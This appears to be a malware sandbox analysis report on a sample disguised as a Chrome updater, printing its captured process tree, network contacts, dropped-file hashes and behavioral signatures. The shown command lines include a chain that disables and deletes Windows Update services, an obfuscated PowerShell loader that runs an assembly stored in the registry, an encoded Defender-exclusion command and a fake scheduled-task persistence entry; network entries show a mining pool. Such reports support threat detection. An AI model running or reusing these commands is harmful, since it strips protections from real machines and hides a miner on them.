PID 2756 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 1276 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2756 wrote to memory of 1724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe

"C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""

C:\Windows\system32\schtasks.exe

schtasks /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {72413DC2-2A6C-4540-B344-0104681548B4} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\system32\taskeng.exe

taskeng.exe {B9FA45F4-EB0A-4D77-B31A-B0F05C23D11D} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "49384658016723260351945230819-2035182398-168646351216807987814174275551674409703"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1210583900-1864933382-504099959169151827521131715211941224944-15666506011230839723"

C:\Users\Admin\Google\Chrome\updater.exe

C:\Users\Admin\Google\Chrome\updater.exe

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{cbe60bff-e555-4475-bc84-4afd6cf62758}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1302879950-840085889-702871329-800904320-2583387719883909082086569638-984941914"

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{037cba3c-de0e-40c6-82ba-f4de163d725c}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1715209253-1549303545-2018470893-1593325933-1324999412-740847104-1082938555-1032977077"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "227570323-1575764454-14458156771985709915-1950362717-886438917-12731077391047296245"

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe "uscznjtdlrpzim"

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe qogpttybmmmxi0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:443 pool.hashvault.pro tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabA9A9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarA9EB.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\Google\Chrome\updater.exe

MD5 40eeb7e6dc706f7e0eac78cc85213220
SHA1 28b55166002c4ba1c9af0ec4fd9f98b591d6e498
SHA256 9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
SHA512 219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f

C:\Windows\Tasks\dialersvc64.job

MD5 dfcf07aa7810781da54d5e03f523af14
SHA1 857afcee0e6156372b43ef87b7cf80b6d0923094
SHA256 283e9b0adf894b1d36786ab59f9d82cd9f2682b55d8cf8be3a7f726c9e206028
SHA512 db013679e607e39e2d2910eed4ebe53f19fffa60f9af86a510552e068ae97387bbff6345135a478c76cd897ac03689bf01a6a5034daaa45e24d2b1633c17b5c4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 89705267bdaf059f6a554857043242c0
SHA1 c2f26480d15e8d74b35f6426553e0be36b976cc7
SHA256 332d9fd123e376d450cdef38b1eb5dfacaff32d3a506fe2e4f97462955e75f87
SHA512 13b752dfe4fa4ba084c6846c8bbe44e09a96823af3883685e08e54769261098e69bc3e5de4a9d086c64584da86708804543ac60e1416e893738223526aac5a1f

C:\Windows\Tasks\dialersvc32.job

MD5 18e4b02054fe004820525aa2841425c3
SHA1 9c06ad9478b70f38fa1ab94274d38e010c6bf64e
SHA256 cc95c734ebe2cc9b775aaee6b540713449a4216f983c3fe8602d302ff9fbaf14
SHA512 154bac0a405e3ad2cc65e9f7f3d40d9efe8ac5885f628c470490f4d08d419b575a376d75afe9c24e7f9bdf3946ba2eddec6fea7df04ff2a2b29397d846bed974

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-14 18:22

Reported

2024-08-14 18:24

Platform

win10v2004-20240802-en

Max time kernel

120s

Max time network

116s

Command Line

winlogon.exe

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 940 created 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 5080 created 632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Google\Chrome\updater.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Google\Chrome\updater.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1723659853" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 14 Aug 2024 18:24:14 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
